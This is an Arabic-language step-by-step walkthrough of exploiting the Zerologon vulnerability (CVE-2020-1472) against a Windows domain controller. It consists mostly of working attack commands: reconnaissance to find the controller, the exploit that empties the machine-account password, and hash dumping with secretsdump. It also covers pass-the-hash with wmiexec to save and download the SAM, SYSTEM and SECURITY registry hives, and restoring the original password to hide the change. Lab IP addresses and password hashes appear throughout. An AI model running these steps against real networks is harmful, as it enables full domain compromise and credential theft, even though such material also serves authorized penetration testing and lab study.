
استغلال لـ CVE-2020-1472 (Zerologon) يعيد تعيين كلمة مرور حساب الآلة لوحدة التحكم بالمجال، مما يتيح تفريغ بيانات الاعتماد ورفع الامتيازات إلى مسؤول المجال.
@toc
المبدأ معقد نوعًا ما، لمن يهمه الأمر يمكنه الاطلاع على المقال في الرابط أدناه https://www.freebuf.com/articles/system/249860.html
يلزم استخدام ملف https://github.com/SecureAuthCorp/impacket/edit/master/impacket/dcerpc/v5/nrpc.py لاستبدال ملف nrpc المحلي. مسار تخزين ملف nrpc المحلي هو: C:\Users\Administrator\AppData\Local\Programs\Python\Python38\Lib\site-packages\impacket\dcerpc\v5\nrpc.py
python cve-2020-1472-exploit.py اسم_حساب_الجهاز ip
ويلاحظ أنه تم إفراغ كلمة مرور حساب الجهاز، وتمثل 31dc... كلمة مرور فارغة.

طرق الحصول على حساب الجهاز المقابل أو اسم netbios:
- net view
اسم الخادم هذا مع $ هو اسم الجهاز، مثل lisi$ أو yukong$.
- nbtstat -A ip
هناك طرق عديدة لتحديد ip وحدة تحكم المجال، مثل:
- عرض المضيفين الذين فتحوا المنفذ 53
- net time يعيد اسم مضيف وحدة تحكم المجال، ثم ping
- أمر systeminfo يعرض قيمة مجال وحدة التحكم، ping للحصول على ip وحدة التحكم
- الاطلاع على dns الخاص بالمضيف الحالي
python secretsdump.py test.com/[email protected] -no-pass
ويلاحظ أنه يمكن الآن استخدام حساب الجهاز بكلمة مرور فارغة لقراءة تجزئات المستخدمين على وحدة تحكم المجال.
python wmiexec.py -hashes :3dbde697d71690a769204beb12283678 test/[email protected] reg save HKLM\SYSTEM system.save reg save HKLM\SAM sam.save reg save HKLM\SECURITY security.save
get system.save get sam.save get security.save
del /f system.save del /f sam.save del /f security.save
exit
بعد التنفيذ، يمكن العثور على الملفات التي تم تنزيلها في المجلد حيث يوجد البرنامج النصي wmiexec:

python secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 test.com/[email protected] -use-vss فشل تنفيذ هذا الأمر
python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
احفظ كلمة المرور في الدائرة الحمراء، هذه هي كلمة مرور الجهاز السابقة، وهي aad3b435b51404eeaad3b435b51404ee:999699ceadecae87fef9a2040ef2213a.
python reinstall_original_pw.py yukong$ 192.168.124.142 999699ceadecae87fef9a2040ef2213a

python secretsdump.py test.com/administrator:[email protected] -just-dc-user yukong$
python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678 test/[email protected] -just-dc-user yukong$
يلاحظ نجاح الاستعادة.